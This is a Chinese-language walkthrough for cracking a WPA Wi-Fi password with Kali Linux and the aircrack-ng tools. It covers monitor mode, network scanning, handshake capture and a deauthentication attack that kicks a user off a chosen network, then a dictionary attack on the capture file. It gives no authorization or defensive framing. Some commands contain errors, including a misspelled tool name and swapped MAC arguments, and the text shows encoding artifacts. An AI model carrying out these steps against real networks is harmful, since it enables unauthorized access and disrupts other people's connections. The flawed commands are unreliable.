首先電腦插入U(xiǎn)SB無(wú)線網(wǎng)卡

wuxianwangka.jpg

然后通過(guò)VMware里面 虛擬機(jī) > 可移動(dòng)設(shè)備 選擇我們的無(wú)線網(wǎng)卡連接，如下圖：

0.png

step1: 查看網(wǎng)卡有沒(méi)有加載進(jìn)來(lái)

root@kali:~# iwconfig 

注：iwconfig是查看無(wú)線網(wǎng)卡，ifconfig 是查看有線網(wǎng)卡

1.png

step2： 開(kāi)啟無(wú)線網(wǎng)卡的偵聽(tīng)功能

root@kali:~# airmon-ng start wlan0

2.png

此時(shí)需要再次查看下網(wǎng)卡：

圖片.png

step3：偵聽(tīng)附近的wifi信號(hào)

root@kali:~# airodump-ng wlan0mon

33.png

3.png

如果出現(xiàn)無(wú)法偵聽(tīng)數(shù)據(jù)，重啟一下服務(wù),命令如下：

root@kali:~# airmon-ng check kill

step4: 選擇你要破解的無(wú)線網(wǎng)絡(luò)（ssid）,抓取握手包

root@kali:~# airodump -c 1 --bssid B0:E1:7E:7D:EA:CC  -w secevery wlan0mon

4-1.png

4-2.png

此時(shí)如果有人連接這個(gè)wifi,就會(huì)產(chǎn)生握手包，我們就會(huì)抓到這個(gè)握手包，但是運(yùn)氣并不是那么好，如上圖所示一直沒(méi)有抓到握手包，因此我們就要手動(dòng)的踢掉一個(gè)人的wifi，這樣它就會(huì)再次自動(dòng)連接wifi，產(chǎn)生一個(gè)握手吧，這樣我們就抓到了握手包。具體來(lái)看下一步:

step5：抓不到握手報(bào)文，需要模擬station，進(jìn)行攻擊

# aireplay-ng -0 10 -a bssid -c station mac wlan0mon
# aireplay-ng -0 10 -a AP的mac地址 -c 你要踢掉的主機(jī)的mac地址 wlan0mon

root@kali:~# aireplay-ng -0 10 -a B0:E1:7E:7D:EA:CC -c B0:E1:7E:7D:EA:CC wlan0mon

5.png

此時(shí)我們?cè)偃タ磩偛艂陕?tīng)握手包的窗口，發(fā)現(xiàn)已經(jīng)抓到了握手包，如下圖所示

55.png

然后查看一下當(dāng)前目錄下抓到的握手包secevery-01.cap

555.png

step6:破解報(bào)文，獲得密碼。 使用字典passwd.txt

root@kali:~# aircrack-ng -a2 -b B0:E1:7E:7D:EA:CC -w passwd.txt secevery-01.cap

6.png